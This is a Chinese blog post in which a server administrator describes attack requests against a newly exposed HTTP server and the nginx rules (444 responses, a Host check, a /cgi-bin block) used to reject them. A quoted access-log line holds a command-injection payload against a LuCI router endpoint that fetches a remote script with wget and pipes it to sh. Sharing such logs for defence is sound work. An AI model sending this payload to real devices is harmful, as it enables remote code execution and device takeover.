最近將一臺HTTP服務器暴露于僅見,隨即引來大量黑客的光顧,其實也就是發各種HTTP請求,以獲取一個輸入,輸出界面,在輸入界面輸入SHELL命令,在輸出界面觀看結果,也就是說不用去到電腦前,用登錄用戶名和密碼這種方法來登錄,再跑各種命令。
日志顯示有下面這些操作:
185.191.127.212 - - [19/Jun/2024:21:10:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1" "-"
60.221.228.127 - - [15/Jun/2024:21:10:02 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Custom-AsyncHttpClient" "-"
于是在NGINX上加上相應規則,遇到類似的直接返回444
其中/etc/nginx/conf/nginx.conf
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log notice;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
#include /etc/nginx/mime.types;
#default_type application/octet-stream;
#paul-1
server_tokens off;
map $remote_addr $loggable {
~^192\.168\.1 0; # 如果IP以192開頭,則不記錄日志
~^219\.888\.888\.888 0; # 如果IP是219.888.888.8,則不記錄日志
default 1; # 其他情況默認記錄日志
}
log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
#paul-2
access_log /var/log/nginx/access.log main if=$loggable;#引用上面的規則
sendfile on;
#tcp_nopush on;
keepalive_timeout 65;
#gzip on;
include /etc/nginx/conf.d/*.conf;
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
upstream uvicorn {
server unix:/tmp/uvicorn.sock;
}
}
/etc/nginx/conf/conf.d/default.conf,這里是將請求轉發后到后端的配置
server {
listen 81;
listen [::]:80;
#paul-3
server_name paulwong88.com;
#paul-4
# 驗證 Host 頭部是否為您的域名
if ($host != 'paulwong88.com') {
return 444; # 對非授權域名的請求直接關閉連接
}
client_max_body_size 4G;
#server_name localhost;
location / {
#include /etc/nginx/mime.types;
#default_type application/octet-stream;
add_header 'Cache-control' 'no-cache';
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_redirect off;
proxy_buffering off;
proxy_pass http://open-webui:8080;
}
#paul-5
location ~ ^/cgi-bin/ {
deny all;
return 444;# 限制對 CGI 目錄的訪問
}
}
/etc/nginx/conf/conf.d/default-web.conf,這里是放置靜態頁面的配置
server {
listen 80;
listen [::]:80;
expires -1;
#paul-3
server_name paulwong88.com;
#paul-4
# 驗證 Host 頭部是否為您的域名
if ($host != 'paulwong88.com') {
return 444; # 對非授權域名的請求直接關閉連接
}
client_max_body_size 4G;
#server_name localhost;
location / {
#如果不加,nginx會亂發http頭,導致瀏覽器無法解析css,js這種文件
include /etc/nginx/mime.types; #默認在http中是有這個配置的,但又重復了一遍,告訴nginx如果碰到各種后綴,如.css,應如何添加http頭
default_type application/octet-stream; #默認在http中是有這個配置的,但又重復了一遍,加默認要加的http頭
root /usr/share/nginx/html;
index index.html index.htm;
}
#paul-5
location ~ ^/cgi-bin/ {
deny all;
return 444;# 限制對 CGI 目錄的訪問
}
#location /static {
# path for static files
#root /path/to/app/static;
#}
#網上建議這樣加,但發現沒效果
#location ~ \.css {
#root /usr/share/nginx/html;
#add_header Content-Type text/css;
#default_type text/css;
#}
#location ~ \.js {
#root /usr/share/nginx/html;
#add_header Content-Type application/x-javascript;
#}
}
這樣基本各路黑客輸入一條命令后,基本就打退堂鼓了。